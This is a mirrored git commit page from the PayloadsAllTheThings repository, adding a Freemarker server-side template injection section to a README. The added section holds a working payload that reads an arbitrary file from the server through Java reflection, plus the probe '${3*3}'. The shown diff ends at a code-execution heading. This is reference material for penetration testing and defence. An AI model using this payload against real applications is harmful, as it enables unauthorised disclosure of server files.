mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
Update README.md
This commit is contained in:
parent
1a3058f40c
commit
a26867fdf9
1 changed files with 7 additions and 0 deletions
|
@ -155,6 +155,13 @@ You can try your payloads at [https://try.freemarker.apache.org](https://try.fre
|
||||||
|
|
||||||
The template can be `${3*3}` or the legacy `#{3*3}`.
|
The template can be `${3*3}` or the legacy `#{3*3}`.
|
||||||
|
|
||||||
|
### Freemarker - Read File
|
||||||
|
|
||||||
|
```js
|
||||||
|
${product.getClass().getProtectionDomain().getCodeSource().getLocation().toURI().resolve('path_to_the_file').toURL().openStream().readAllBytes()?join(" ")}
|
||||||
|
Convert the returned bytes to ASCII
|
||||||
|
```
|
||||||
|
|
||||||
### Freemarker - Code execution
|
### Freemarker - Code execution
|
||||||
|
|
||||||
```js
|
```js
|
||||||
|
|
Loading…
Reference in a new issue